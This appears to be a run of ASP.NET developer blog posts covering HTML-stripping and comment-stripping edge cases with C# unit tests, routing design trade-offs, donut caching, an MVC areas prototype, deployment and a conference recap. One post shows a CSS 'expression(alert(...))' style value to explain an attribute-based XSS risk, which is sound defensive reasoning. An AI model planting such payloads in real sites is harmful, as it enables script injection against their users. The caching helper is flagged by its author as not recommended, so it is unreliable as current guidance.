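A scanner that handles this case can’t just search for the next “>”; it has to know whether it is inside a quoted attribute value first. Here’s a minimal sketch of that idea (my own illustration, not the solution I’ll post later):

```csharp
// Returns the index of the '>' that actually closes the tag starting at
// `start`, or -1 if the tag never closes. A '>' appearing inside a quoted
// attribute value does not count as the end of the tag.
static int FindTagEnd(string html, int start) {
    char quote = '\0'; // active quote character, or '\0' when outside quotes
    for (int i = start; i < html.Length; i++) {
        char c = html[i];
        if (quote != '\0') {
            if (c == quote) quote = '\0';          // closing quote
        }
        else if (c == '"' || c == '\'') quote = c; // opening quote
        else if (c == '>') return i;               // unquoted '>' ends the tag
    }
    return -1;
}
```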

Here’s another case:

<foo =test>title />

This is a non-quoted attribute value, but in this case, the inner angle bracket should close the tag, leaving you with “title />”.

Here’s a case that surprised me.


<foo <>Test

That one strips everything except “<>Test”.

It gets even better…


strips out everything except “Test”.

And finally, here’s one that’s a real doozy.


Check out how Firefox, IE, and Google Chrome render this same piece of markup.




One of these kids is doing his own thing! ;) For my unit test, I decided to go with majority rules here (I did not test with Opera) and went with the behavior of the two rather than Firefox.

The Challenge

The following is the shell of a method for stripping HTML from a string based on the requirements listed above.

public static class Html {
  public static string StripHtml(string html) {
    throw new NotImplementedException("implement this");
  }
}
Your challenge, should you choose to accept it, is to implement this method such that the following unit tests pass. I apologize for the small font, but I used some long names and wanted it to fit.

public void NullHtml_ThrowsArgumentNullException() {
    try {
        Html.StripHtml(null);
        Assert.Fail("Expected an ArgumentNullException");
    }
    catch (ArgumentNullException) {
    }
}

public void Html_WithEmptyString_ReturnsEmpty() {
    Assert.AreEqual(string.Empty, Html.StripHtml(string.Empty));
}

public void Html_WithNoTags_ReturnsTextOnly() {
    string html = "This has no tags!";
    Assert.AreEqual(html, Html.StripHtml(html));
}

public void Html_WithOnlyATag_ReturnsEmptyString() {
    string html = "<foo>";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));
}

public void Html_WithOnlyConsecutiveTags_ReturnsEmptyString() {
    string html = "<foo><bar><baz />";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));
}

public void Html_WithTextBeforeTag_ReturnsText() {
    string html = "Hello<foo>";
    Assert.AreEqual("Hello", Html.StripHtml(html));
}

public void Html_WithTextAfterTag_ReturnsText() {
    string html = "<foo>World";
    Assert.AreEqual("World", Html.StripHtml(html));
}

public void Html_WithTextBetweenTags_ReturnsText() {
    string html = "<p><foo>World</foo></p>";
    Assert.AreEqual("World", Html.StripHtml(html));
}

public void Html_WithClosingTagInAttrValue_StripsEntireTag() {
    string html = "<foo title=\"/>\" />";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));
}

public void Html_WithTagClosedByStartTag_StripsFirstTag() {
    string html = "<foo <>Test";
    Assert.AreEqual("<>Test", Html.StripHtml(html));
}

public void Html_WithSingleQuotedAttrContainingDoubleQuotesAndEndTagChar_StripsEntireTag() {
    string html = @"<foo ='test""/>title' />";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));
}

public void Html_WithDoubleQuotedAttributeContainingSingleQuotesAndEndTagChar_StripsEntireTag() {
    string html = @"<foo =""test'/>title"" />";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));
}

public void Html_WithNonQuotedAttribute_StripsEntireTagWithoutStrippingText() {
    string html = @"<foo title=test>title />";
    Assert.AreEqual("title />", Html.StripHtml(html));
}

public void Html_WithNonQuotedAttributeContainingDoubleQuotes_StripsEntireTagWithoutStrippingText() {
    string html = @"<p title = test-test""-test>title />Test</p>";
    Assert.AreEqual("title />Test", Html.StripHtml(html));
}

public void Html_WithNonQuotedAttributeContainingQuotedSection_StripsEntireTagWithoutStrippingText() {
    string html = @"<p title = test-test""- >""test> ""title />Test</p>";
    Assert.AreEqual(@"""test> ""title />Test", Html.StripHtml(html));
}

public void Html_WithTagClosingCharInAttributeValueWithNoNameFollowedByText_ReturnsText() {
    string html = @"<foo = "" />title"" />Test";
    Assert.AreEqual("Test", Html.StripHtml(html));
}

public void Html_WithTextThatLooksLikeTag_ReturnsText() {
    string html = @"<çoo = "" />title"" />Test";
    Assert.AreEqual(html, Html.StripHtml(html));
}

public void Html_WithCommentOnly_ReturnsEmptyString() {
    string s = "<!-- this go bye bye>";
    Assert.AreEqual(string.Empty, Html.StripHtml(s));
}

public void Html_WithNonDashDashComment_ReturnsEmptyString() {
    string s = "<! this go bye bye>";
    Assert.AreEqual(string.Empty, Html.StripHtml(s));
}

public void Html_WithTwoConsecutiveComments_ReturnsEmptyString() {
    string s = "<!-- this go bye bye><!-- another comment>";
    Assert.AreEqual(string.Empty, Html.StripHtml(s));
}

public void Html_WithTextBeforeComment_ReturnsText() {
    string s = "Hello<!-- this go bye bye -->";
    Assert.AreEqual("Hello", Html.StripHtml(s));
}

public void Html_WithTextAfterComment_ReturnsText() {
    string s = "<!-- this go bye bye -->World";
    Assert.AreEqual("World", Html.StripHtml(s));
}

public void Html_WithAngleBracketsButNotHtml_ReturnsText() {
    string s = "<$)*(@&$(@*>";
    Assert.AreEqual(s, Html.StripHtml(s));
}

public void Html_WithCommentInterleavedWithText_ReturnsText() {
    string s = "Hello <!-- this go bye bye --> World <!--> This is fun";
    Assert.AreEqual("Hello  World  This is fun", Html.StripHtml(s));
}

public void Html_WithCommentBetweenNonTagButLooksLikeTag_DoesStripComment() {
    string s = @"<ç123 title=""<!bc def>"">";
    Assert.AreEqual(@"<ç123 title="""">", Html.StripHtml(s));
}

public void Html_WithTagClosedByStartComment_StripsFirstTag() {
    //Note in Firefox, this renders: <!--foo>Test
    string html = "<foo<!--foo>Test";
    Assert.AreEqual("Test", Html.StripHtml(html));
}

public void Html_WithTagClosedByProperComment_StripsFirstTag() {
    string html = "<FOO<!-- FOO -->Test";
    Assert.AreEqual("Test", Html.StripHtml(html));
}

public void Html_WithTagClosedByEmptyComment_StripsFirstTag() {
    string html = "<foo<!>Test";
    Assert.AreEqual("Test", Html.StripHtml(html));
}

What’s the moral of this story, apart from “Phil has way too much time on his hands”? In part, it’s that parsing HTML is fraught with peril. I wouldn’t be surprised if there are some cases here that I’m missing. If so, let me know. I used Firefox’s DOM explorer to help verify the behavior I was seeing.

I think this is also another example of the challenges of software development in general along with the 80-20 rule. It’s really easy to write code that handles 80% of the cases. Most of the time, that’s good enough. But when it comes to security code, even 99% is not good enough, as hackers will find that 1% and exploit it.

In any case, I think I’m really done with this topic for now. I hope it was worthwhile. And as I said, I’ll post my code solution to this later. Let me know if you find missing test cases.

Technorati Tags: html,parsing

code, regex comments edit

A while ago I wrote a blog post about how painful it is to properly parse an email address. This post is kind of like that, except that this time, I take on HTML.

I’ve written about parsing HTML with a regular expression in the past and pointed out that it’s extremely tricky and probably not a good idea to use regular expressions in this case. In this post, I want to strip out HTML comments. Why?

I had some code that uses a regular expression to strip comments from HTML, but found one of those feared “pathological” cases in which it seems to never complete, pegging my CPU at 100% in the meantime. I figured I might as well look into a character-by-character approach to stripping HTML.

It sounds easy at first, and my first attempt was roughly 34 lines of procedural style code. But then I started digging into the edge cases. Take a look at this:

<p title="<!-- this is a comment-->">Test 1</p>

Should I strip that comment within the attribute value or not? Technically, this isn’t valid HTML since the first angle bracket within the attribute value should be encoded. However, the three browsers I checked (IE 8, FF3, Google Chrome) all honor this markup and render the following.


Notice that when I put the mouse over “Test 1”, the browser rendered the value of the title attribute as a tooltip. That’s not even the funkiest case. Check this bit out in which my comment is an unquoted attribute value. Ugly!

<p title=<!this-comment>Test 2</p>

Still, the browsers dutifully render it:


At this point, it might seem like I’m spending too much time worrying about crazy edge cases, which is probably true. Should I simply strip these comments even when they happen to be within attribute values, since they’re technically invalid? It worries me a bit to impose a different behavior than the browser does.

Just thinking out loud here, but what if the user can specify a style attribute (bad idea) for an element and they enter:

<!>color: expression(alert('test'))

Which fully rendered yields: <p style="<!>color: expression(alert('test'))">

If we strip out the comment, then suddenly, the style attribute might lend itself to an attribute based XSS attack.

I tried this on the three browsers I mentioned and nothing bad happened, so maybe it’s a non issue. But I figured it would probably make sense to strip HTML comments only in the same cases that the browser does. So I decided to not strip any comments within an HTML tag, which means I have to identify HTML tags. That starts to get a bit ugly, as <foo > is assumed to be an HTML tag and not displayed, while <çoo /> is just content and displayed.

Before I show the code, I should clarify something. I’ve been a bit imprecise here. Technically, a comment starts with a -- character sequence, but I’ve referred to markup such as <!> as being a comment. Technically it’s not, but it behaves like one in the sense that the browser DOM recognizes it as such. With HTML you can have multiple comments between the <! and the > delimiters according to section 3.2.5 of RFC 1866.


   To include comments in an HTML document, use a comment declaration. A
   comment declaration consists of `<!' followed by zero or more
   comments followed by `>'. Each comment starts with `--' and includes
   all text up to and including the next occurrence of `--'. In a
   comment declaration, white space is allowed after each comment, but
   not before the first comment.  The entire comment declaration is
   terminated by `>'.

      NOTE - Some historical HTML implementations incorrectly consider
      any `>' character to be the termination of a comment.

   For example:

    <TITLE>HTML Comment Example</TITLE>
    <!-- Id: html-sgml.sgm,v 1.5 1995/05/26 21:29:50 connolly Exp  -->
    <!-- another -- -- comment -->
    <p> <!- not a comment, just regular old data characters ->
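The quoted rules can be sketched as a small scanning routine. This is my own illustration of the RFC behavior, not the post’s code; note that the unit tests in this post deliberately follow the “historical” browser behavior the NOTE describes, where any `>` terminates the declaration.

```csharp
// Skips a comment declaration per RFC 1866 section 3.2.5: "<!" followed by
// zero or more "--...--" comments, whitespace allowed after each comment,
// terminated by ">". Returns the index just past the closing '>', or -1 if
// the declaration is malformed or never terminates.
static int SkipCommentDeclaration(string html, int start) {
    int i = start + 2; // skip over the leading "<!"
    while (i < html.Length) {
        if (html[i] == '>')
            return i + 1;                        // end of the declaration
        if (html[i] == '-' && i + 1 < html.Length && html[i + 1] == '-') {
            int end = html.IndexOf("--", i + 2); // comment runs to the next "--"
            if (end < 0) return -1;              // unterminated comment
            i = end + 2;
        }
        else if (char.IsWhiteSpace(html[i])) {
            i++;                                 // whitespace allowed after a comment
        }
        else {
            return -1;                           // not a valid comment declaration
        }
    }
    return -1;
}
```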

The code I wrote today was straight up old school procedural code with no attempt to make it modular, maintainable, object oriented, etc. I posted it here with the unit tests I defined.

In the end, I might not use this code as I realized later that what I really should be doing in the particular scenario I have is simply stripping all HTML tags and comments. In any case, I hope to never have to parse HTML again. ;)

humor, personal comments edit

During my talk at the PDC, I heeded Hanselman’s call to action and decided to veer away from the Northwind “Permademo” and build something different.

In the middle of the talk, I unveiled that I was going to build a competitor to StackOverflow which I would call HaackOverflow. This was all news to Jeff as he hadn’t seen the demo until that point.

The demo walked through some basics of building a standards based ASP.NET MVC application, and sprinkled in a bit of AJAX. At the very end, I swapped out the site.css file and added an image and changed the site from the drab default blue template to something that looked similar in spirit to StackOverflow.


If you haven’t seen the talk yet, you can watch it on Channel9. The links to my slides and the source code are also available on that page.

I only mention it now because Jeff recently Twittered a link to the Reddit Remix of the StackOverflow logo, which reminded me of my own hack job on their logo.

Technorati Tags: stackoverflow,pdc08

code, mvc comments edit

Usability and Discoverability (also referred to as Learnability) are often confused with one another, but they really are distinct concepts. In Joel Spolsky’s wonderful User Interface Design for Programmers (go read it!), Joel provides a metaphor to highlight the difference.

It takes several weeks to learn how to drive a car. For the first few hours behind the wheel, the average teenager will swerve around like crazy. They will pitch, weave, lurch, and sway. If the car has a stick shift they will stall the engine in the middle of busy intersections in a truly terrifying fashion. If you did a usability test of cars, you would be forced to conclude that they are simply unusable.


This is a crucial distinction. When you sit somebody down in a typical usability test, you’re really testing how learnable your interface is, not how usable it is. Learnability is important, but it’s not everything. Learnable user interfaces may be extremely cumbersome to experienced users. If you make people walk through a fifteen-step wizard to print, people will be pleased the first time, less pleased the second time, and downright ornery by the fifth time they go through your rigamarole.

Sometimes all you care about is learnability: for example, if you expect to have only occasional users. An information kiosk at a tourist attraction is a good example; almost everybody who uses your interface will use it exactly once, so learnability is much more important than usability.

Rick Osborne in his post, Usability vs Discoverability, also covers this distinction, while Scott Berkun points out in his post on The Myth of Discoverability that you can’t have everything be discoverable.

These are all examples of the principle that there is no such thing as a perfect design. Design always consists of trade-offs.

Let’s look at an example using a specific feature of ASP.NET Routing that illustrates this trade-off. One of the things you can do with routes is specify constraints for the various URL parameters via the Constraints property of the Route class.

The type of this property is RouteValueDictionary which contains string keys mapped to object values. Note that by having the values of this dictionary be of type object, the value type isn’t very descriptive of what the value should be. This hurts learnability, but let’s dig into why we did it this way.

One of the ways you can specify the value of a constraint is via a regular expression string like so:

Route route = new Route("{foo}/{bar}", new MyRouteHandler());
route.Constraints = 
  new RouteValueDictionary {{"foo", "abc.*"}, {"bar", @"\w{4}"}};

This route specifies that the foo segment of the URL must start with “abc” and that the bar segment must be four characters long. Pretty dumb, yeah, but it’s just an example to get the point across.

We figure that in 99.9% of the cases, developers will use regular expression constraints. However, there are several cases we identified in which a regular expression string isn’t really appropriate, such as constraining the HTTP Method. We could have hard coded the special case, which we originally did, but decided to make this extensible because more cases started cropping up that were difficult to handle. This is when we introduced the IRouteConstraint interface.

At this point, we had a decision to make. We could have changed the type of the Constraints property to something where the values are of type IRouteConstraint rather than object in order to aid discoverability. Doing this would require that we then implement and include a RegexConstraint along with an HttpMethodConstraint.

Thus the above code would look like:

Route route = new Route("{foo}/{bar}", new MyRouteHandler());
route.Constraints = 
  new RouteConstraintDictionary {{"foo", new RegexConstraint("abc.*")}, 
    {"bar", new RegexConstraint(@"\w{4}")}};

That’s definitely more discoverable, but at the cost of usability in the general case (note that I didn’t even include other properties of a route you would typically configure). For most users, who stick to simple regular expression constraints, we’ve just made the API more cumbersome to use.

It would’ve been really cool if we could monkey patch an implicit conversion from string to RegexConstraint as that would have made this much more usable. Unfortunately, that’s not an option.

So we made the call to favor usability in this one case at the expense of discoverability, and added the bit of hidden magic that if the value of an item in the constraints dictionary is a string, we treat it as a regular expression. But if the value is an instance of a type that implements IRouteConstraint, we’d call the Match method on it.
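In code, the convention described above amounts to a type check on each constraint value. This is a hedged sketch of the dispatch from inside a Route-like class, not the actual System.Web.Routing source:

```csharp
// Decide how to process a single constraint entry: an IRouteConstraint gets
// its Match method called; a plain string is treated as a regular expression
// applied to the whole parameter value.
protected bool ProcessConstraint(HttpContextBase httpContext, object constraint,
        string parameterName, RouteValueDictionary values) {
    IRouteConstraint custom = constraint as IRouteConstraint;
    if (custom != null) {
        return custom.Match(httpContext, this, parameterName, values,
            RouteDirection.IncomingRequest);
    }

    // The "hidden magic": a string constraint is a regex over the full value.
    string pattern = (string)constraint;
    string value = Convert.ToString(values[parameterName],
        CultureInfo.InvariantCulture);
    return Regex.IsMatch(value, "^(" + pattern + ")$",
        RegexOptions.CultureInvariant | RegexOptions.IgnoreCase);
}
```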

It’s not quite as discoverable the first time, but after you do it once, you’ll never forget it and it’s much easier to use every other time you use it.

Making Routing with MVC More Usable

Keep in mind that Routing is a separate feature from ASP.NET MVC. So what I’ve covered applies specifically to Routing.

When we looked at how Routing was used in MVC, we realized we had room for improving the usability. Pretty much every time you define a route, the route handler you’ll use is MvcRouteHandler, so it was odd to require users to specify that for every route. Not only that, but once you got used to routing, you’d want a shorthand for defining defaults and constraints without having to go through the full collection initializer syntax for RouteValueDictionary.

This is when we created the set of MapRoute extension methods specific to ASP.NET MVC to provide a façade for defining routes. Note that if you prefer the more explicit approach, we did not remove the RouteCollection’s Add method. We merely layered on the MapRoute extensions to RouteCollection to make defining routes simpler. Again, a trade-off in that the arguments to the MapRoute methods are not as discoverable as using the explicit approach, but they are usable once you understand how they work.
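To see the trade-off side by side, here is the MapRoute shorthand next to a roughly equivalent explicit form (using the standard default route values):

```csharp
// The MapRoute extension method shorthand:
routes.MapRoute(
    "Default",
    "{controller}/{action}/{id}",
    new { controller = "Home", action = "Index", id = "" });

// Roughly the equivalent explicit form using RouteCollection.Add:
routes.Add("Default",
    new Route("{controller}/{action}/{id}", new MvcRouteHandler()) {
        Defaults = new RouteValueDictionary(
            new { controller = "Home", action = "Index", id = "" })
    });
```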

Addressing Criticisms

We spent a lot of time thinking about these design decisions and trade-offs, but it goes without saying that it will invite criticisms. Fortunately, part of my job description is to have a thick skin. ;)

In part, by favoring usability in this case, we’ve added a bit of friction for those who are just starting out with ASP.NET MVC, just like in Joel’s example of the teenager learning to drive. However, after multiple uses, it becomes second nature, which to me signifies that it is usable. Rather than a flaw in our API, I see this more as a deficiency in our documentation and Intellisense support, but we’re working on that. This is an intentional trade-off we made based on feedback from people building multiple applications.

But I understand it won’t please everyone. What would be interesting for me to hear is whether these usability enhancements work. After you struggle to define constraints the first time, was it a breeze the next time and the time after that, especially when compared to the alternative?

mvc, code comments edit

UPDATE: Due to differences in the way that ASP.NET MVC 2 processes requests, data within the substitution block can be cached when it shouldn’t be. Substitution caching for ASP.NET MVC is not supported and has been removed from our ASP.NET MVC Futures project.

This technique is NOT RECOMMENDED for ASP.NET MVC 2.

With ASP.NET MVC, you can easily cache the output of an action by using the OutputCacheAttribute like so.

[OutputCache(Duration=60, VaryByParam="None")]
public ActionResult CacheDemo() {
  return View();
}
One of the problems with this approach is that it is an all or nothing approach. What if you want a section of the view to not be cached?

Well, ASP.NET does include a <asp:Substitution …/> control which allows you to specify a method on your Page class that gets called every time the page is requested. ScottGu wrote about this way back when in his post on Donut Caching.

However, this doesn’t seem very MVC-ish, as pointed out by Maarten Balliauw in this post in which he implements his own means for adding output cache substitution.

However, it turns out that the Substitution control I mentioned earlier makes use of an existing API that’s already publicly available in ASP.NET. The HttpResponse class has a WriteSubstitution method which accepts an HttpResponseSubstitutionCallback delegate. The method you supply is given an HttpContext instance and allows you to return a string which is displayed in place of the substitution point.

I thought it’d be interesting to create an Html helper which makes use of this API, but supplies an HttpContextBase instead of an HttpContext. Here’s the source code for the helper and delegate.

public delegate string MvcCacheCallback(HttpContextBase context);

public static object Substitute(this HtmlHelper html, MvcCacheCallback cb) {
    html.ViewContext.HttpContext.Response.WriteSubstitution(
        c => HttpUtility.HtmlEncode(
            cb(new HttpContextWrapper(c))));
    return null;
}

The reason this method returns a null object is to make the usage of it seem natural. Let me show you the usage and you’ll see what I mean. Referring back to the controller code at the beginning of this post, imagine you have the following markup in your view.

<!-- this is cached -->
<%= DateTime.Now %>

<!-- and this is not -->
<%= Html.Substitute(c => DateTime.Now.ToString()) %>

On the first request to this action, the entire page is rendered dynamically and you’ll see both dates match. But when you refresh, only the lambda expression is called and is used to replace that portion of the cached view.

I have to thank Dmitry, our PUM and the first developer on ASP.NET way back in the day, for pointing out this little known API method to me. :)

We will be looking into hopefully including this in v1 of ASP.NET MVC, but I make no guarantees.

mvc comments edit

UPDATE: I updated the prototype to work against the ASP.NET MVC 1.0 RTM. Keep in mind, this is *NOT* a backport of the ASP.NET MVC 2 feature so there may be some differences.

A question that comes up a lot is how to partition an ASP.NET MVC application into separate “areas,” so I put together a quick prototype. The funny part with things like this is that I’ve probably spent as much time writing this blog post as I did working on the prototype, if not more!

The scenario that areas address is being able to partition your application into discrete areas of functionality. It helps make managing a large application more manageable and allows for creating distinct applets that you can drop into an application.

For example, suppose I want to drop in a blogs subfolder, complete with its own controllers and views, along with a forums subfolder with its own controllers and views, into a default project. The end result might look like the following screenshot (area folders highlighted).


Notice that these folders have their own Views, Content, and Controllers directories. This is similar to a solution proposed by Steve Sanderson, but he ran into a few problems we’d like to resolve.

  • URL generation doesn’t take namespaces into consideration when generating a URL. We want to be able to easily generate URLs to other areas.
  • When you are within one area, and you call Html.ActionLink to link to another action in the same area, you’d like to not have to specify the area name. You’d also like to not be forced to specify a route name.
  • You still want to be able to link to another area by specifying the area name. And, you want to be able to have controllers of the same name within the same area.
  • You also want to be able to link to the “root” area, aka the default HomeController that comes with the project template that is not located in an area.

The prototype I put together resolves these problems by adopting and enforcing a few constraints when it comes to areas.

  • The area portion comes first in the URL.
  • Controller namespaces must have a specific format that includes the area name in the namespace.
  • The root controllers that are not in any area have a default area name of “root”.
  • When resolving a View/Partial View for a controller within an area, we search in the area’s Views folder first. If not found there, we then look in the root Views folder.

Overridable Templating

This last point bears a bit of elaboration. It is a technique that came about from some experimentation I did on a potential new way of skinning for Subtext.

In the Blogs area, I have a partial view called LoginUserControl.ascx. In the Forums area, I don’t have this partial view. Thus when you go to the Forums area, it falls back to the root Views directory in order to render this partial view. But in the Blogs area, it uses the one specified in the area. This is a convenient way of implementing overridable templating and is reminiscent of ASP.NET Dynamic Data.

If you run the sample, you’ll see what I mean. When you hit the Blogs area, the login link is replaced by some text saying “Blogs don’t need no stinking login”, but the Forums area still has the login link.

Note that all of these conventions are specifically for this prototype. It would be very easy to relax these constraints to fit your own way of doing things. I just wanted to show how this could be done using the current ASP.NET MVC bits.

Registering Routes

The first thing we do is call two new extension methods I wrote to register routes for the areas. This call is made in the RegisterRoutes method in Global.asax.cs.

    // "MyRootNamespace" stands in for your project's root namespace.
    routes.MapAreas("{controller}/{action}/{id}",
        "MyRootNamespace",
        new[] { "Blogs", "Forums" });

    routes.MapRootArea("{controller}/{action}/{id}",
        "MyRootNamespace",
        new { controller = "Home", action = "Index", id = "" });

The first argument to the MapAreas method is the Routing URL pattern you know and love. We will prepend an area to that URL. The second argument is a root namespace. By convention, we will append “.Areas.AreaName.Controllers” to the provided root namespace and use that as the namespace in which we lookup controller types.

For example, suppose you have a root namespace of MyRootNamespace. If you have a HomeController class within the Blogs area, its full type name would need to be:

    MyRootNamespace.Areas.Blogs.Controllers.HomeController
Again, this is a convention I made up; it could easily be changed. The nice thing about following this convention is that you don’t really have to think about namespaces if you follow the directory structure I outlined. You just focus on your areas.

The last argument to the method is a string array of the “areas” in your application. Perhaps I could derive this automatically by examining the file structure, but I put together this prototype in the morning and didn’t think of that till I was writing this blog post. ;)

The second method, MapRootArea, is exactly the same as MapRoute, except it adds a default of area = “root” to the defaults dictionary.
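Given that description, a minimal sketch of MapRootArea might look like the following. This is my guess at the shape of the extension method, assuming it delegates to the standard MapRoute and injects the area default; the route name and namespace handling are assumptions, not the actual prototype code.

```csharp
// Hypothetical sketch: same shape as MapRoute, plus an area = "root" default.
public static class RootAreaExtensions
{
    public static Route MapRootArea(this RouteCollection routes,
        string url, string rootNamespace, object defaults)
    {
        Route route = routes.MapRoute("RootArea", url, defaults);
        route.Defaults["area"] = "root";                 // default area token
        route.DataTokens["namespaces"] =                 // where to find controllers
            new[] { rootNamespace + ".Controllers" };
        return route;
    }
}
```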

Registering the ViewEngine

I also wrote a very simple custom view engine that knows how to look in the Areas folder first, before looking in the root Views folder when searching for a view or partial view.

I wrote this in such a way that it replaces the default view engine. To make this switch, I added the following in Global.asax.cs in the Application_Start method.

ViewEngines.Engines.Clear();
ViewEngines.Engines.Add(new AreaViewEngine());

The code for the AreaViewEngine is fairly simple. It inherits from WebFormViewEngine and looks in the appropriate area first for a given view or partial view before looking in the default location. The way I accomplished this was by adding some catch-all location formats, such as ~/{0}.aspx, and formatting those myself in the code.
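Here is roughly what that could look like. This is my sketch of the approach just described, not the actual prototype source; the member names in the comments are assumptions.

```csharp
// Hedged sketch: probe the area's Views folder, then fall back to the root.
public class AreaViewEngine : WebFormViewEngine
{
    public AreaViewEngine()
    {
        // Catch-all formats; the real virtual path is composed in the
        // FindView/FindPartialView overrides by trying the area folder first.
        ViewLocationFormats        = new[] { "~/{0}.aspx", "~/{0}.ascx" };
        PartialViewLocationFormats = ViewLocationFormats;
    }

    // The overrides (not shown) would format paths in this order:
    //   ~/Areas/{area}/Views/{controller}/{viewName}.aspx   (try first)
    //   ~/Views/{controller}/{viewName}.aspx                (fall back)
}
```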

If that last sentence meant nothing to you, don’t worry. It’s an implementation detail of the view engine.

Linking to Areas

In the root view, I have the following markup to link to the HomeController and Index action of each area.

<%= Html.ActionLink("Blog Home", "Index", new { area="Blogs" } )%>
<%= Html.ActionLink("Forums Home", "Index", new { area="Forums" } )%>

However, within an area, I don’t have to specify the area when linking to another action within the same area. It chooses the current area by default. For example, here’s the code to render a link to the Blogs area’s Posts action.

<%= Html.ActionLink("Blogs Posts", "Posts") %>

That’s no different than if you weren’t doing areas. Of course, if I want to link to the forums area, I need to specify that. Also, if I want to link to an action in the root, I need to specify that as well.

<%= Html.ActionLink("Forums", "Index", new { area = "forums" }) %>
<%= Html.ActionLink("Root Home", "Index", new { area = "root" }) %>

As you click around in the sample, you’ll notice that I changed the background color when in a different area to highlight that fact.

Next Step, Nested Areas

One thing my prototype doesn’t address is nested areas. This is something I’ll try to tackle next. I’m going to see if I can clean up the implementation later and possibly get it into the MVC Futures project. This is just some early playing around I did on my own, so do let me know if you have better ideas for improving this.

Download the Sample

mvc, comments edit

With the release of ASP.NET MVC Beta, the assemblies distributed with ASP.NET MVC are automatically installed into the GAC.

  • System.Web.Mvc
  • System.Web.Routing
  • System.Web.Abstractions

While developing an application locally, this isn’t a problem. But when you are ready to deploy your application to a hosting provider, this might well be a problem if the hoster does not have the ASP.NET MVC assemblies installed in the GAC.

Fortunately, ASP.NET MVC is still bin-deployable. If your hosting provider has ASP.NET 3.5 SP1 installed, then you’ll only need to include the MVC DLL. If your hosting provider is still on ASP.NET 3.5, then you’ll need to deploy all three. It turns out that it’s really easy to do so.

Also, ASP.NET MVC runs in Medium Trust, so it should work with most hosting providers’ Medium Trust policies. It’s always possible that a hosting provider customizes their Medium Trust policy to be draconian.

What I like to do is use the Publish feature of Visual Studio to publish to a local directory and then upload the files to my hosting provider. If your hosting provider supports FTP, you can often skip this intermediate step and publish directly to the FTP site.

The first thing I do in preparation is to go to my MVC web application project and expand the References node in the project tree. Select the aforementioned three assemblies and, in the Properties window, set Copy Local to True.


Now just right click on your application and select Publish.


This brings up the following Publish wizard.


Notice that in this example, I selected a local directory. When I hit Publish, all the files needed to deploy my app are available in the directory I chose, including the assemblies that were in the GAC.


Now I am ready to XCOPY the application to my host, but before I do that, I really should test the application as a bin deployed app to be on the safe side.
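If you go the XCOPY route, the copy itself is a one-liner from a Windows command prompt. The paths here are made up; substitute your own publish directory and host share.

```shell
xcopy /E /I C:\publish\MyMvcApp \\myhost\wwwroot\MyMvcApp
```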

Ideally, I would deploy this to some staging server, or a virtual machine that does not have ASP.NET MVC installed. Otherwise, I’m forced to uninstall ASP.NET MVC on the current machine and then test the application.

You might be wondering, as I did, why I can’t just use gacutil to temporarily unregister the assembly, test the app, then use it again to register the assembly. Because it was installed using an MSI, Windows won’t let you unregister it. Here’s a command prompt window that shows what I got when I tried.


Notice that it says the “assembly is required by one or more applications”. In general, there shouldn’t be any difference between running your application with MVC GAC’d and un-GAC’d. But don’t just take my word for it; test it out to be sure.

code, personal comments edit

Whew! I’ve finally found a bit of time to write about my impressions of the PDC 2008 conference. If you’re looking for insightful commentary and a “What does this all mean” post, you’ve come to the wrong place. There are plenty of others providing that sort of commentary. I’ll just string together some random impressions and pics from my perspective.

First of all, one thing I’m very impressed with is that all sessions are viewable online almost immediately afterwards, with full video of the slides and the presenter. Now I understand why they asked me not to pace too much. To see my presentation, visit its Channel9 page. Note that my slides and sample code are now up there.

I had a great time delivering this talk (see photo of the room before I started above) and, as I wrote before, I uncovered a new presentation tip.

There were 1150 attendees at the talk. If you saw my talk, be sure to submit an eval as the last time I checked, only 95 people did.

Of course, the best part of the conference (besides excessive amounts of RockBand) is hanging out with the people! I spent time at the ASP.NET lounge at various points in the conference answering a boatload of questions about ASP.NET MVC. This has inspired a nice backlog of posts I should write.

I also spent a lot of time in the Open Spaces area enjoying the geekout sessions. Especially Dustin Campbell’s session on currying, closures, etc… which turned into a discussion of functional languages as I was showing up.

Of course, the various parties were great too. I don’t have pictures of the Universal Studios trip, unfortunately, but I will say the Simpsons ride was awesome. I only brought my camera to the Dev After Dark party on Wednesday night, which is where most of these are from.

Here you can see Jeff Atwood, Miguel de Icaza, and me having a good time at the JLounge. We tried to get it renamed to NLounge, but to no avail.

One of the highlights of the evening was running into my coworker’s hero, The Dude from The Big Lebowski, holding a white russian!

Ok, it’s actually Ted Neward graciously posing with my drink as this was probably the 2048^th^ time he heard this joke.

And wouldn’t you know it, the Microsofties from the early days showed up to the party. There’s young Bill in the lower left corner.

It was very interesting to meet so many people in person who I’ve “met” before via comments in our forums, on my blog, Twitter, etc…

Especially in the cases where a person in the past reported a bug in a forum, and then at PDC had the opportunity to explain it to me so that we both understood the issue more clearly. In any case, I’m hopefully done travelling for the year.

personal, code comments edit

In my last post, I joked that the reason that someone gave me all 1s in my talk was a misunderstanding of the evaluation form. In truth, I just assumed that someone out there really didn’t like what I was showing and that’s totally fine. It was something I found funny and I didn’t really care too much.

But I received a message from someone that they tried to evaluate the session from the conference hall, but the evaluation form was really screwy on their iPhone. For example, here’s how it’s supposed to look in IE.


I checked it out with Google Chrome which uses WebKit, the same rendering engine that Safari, and thus the iPhone, uses.

Here it is (click to see full size).


Notice anything different? :)

The good news is that there’s nothing really at stake here for me, as speaking is a perk of my job, not a requirement. It doesn’t affect my reviews. I’d bet this form has been in use for years and was built long before the iPhone.

However, if we ever start deciding elections online, this highlights one of the subtle design issues the designers of such a ballot would need to address.

It’s not just an issue of testing for the current crop of browsers, it’s also about anticipating what future browsers might do.

Such a form would really need to have simple semantic standards based markup and be rendered in such a way that if CSS were disabled, submitting the form would still reflect the voter’s intention.

For example, it may be hard to anticipate every possible browser rendering of a form. In this case, one fix would be to change the label for the radio buttons to reflect the intention. Thus rather than the number “1” the radio button label would be “1 – Very Dissatisfied”. Sure, it repeats the column information, but no matter where the radio buttons are displayed, it reflects the voter’s intention.

In any case, I think the funny part of this whole thing is when I mentioned this one evaluation score, several people I know all laid claim to being the one who hated my talk. They all want to take credit for hating on my talk, without going through all the trouble of actually submitting bad scores. ;)

If you were at the conference and saw my talk, be sure to evaluate it. And do be kind. :)

UPDATE: Be sure to read John Lam’s account of the PDC as well. He has some great suggestions for conference organizers to improve the evaluation process.

personal comments edit

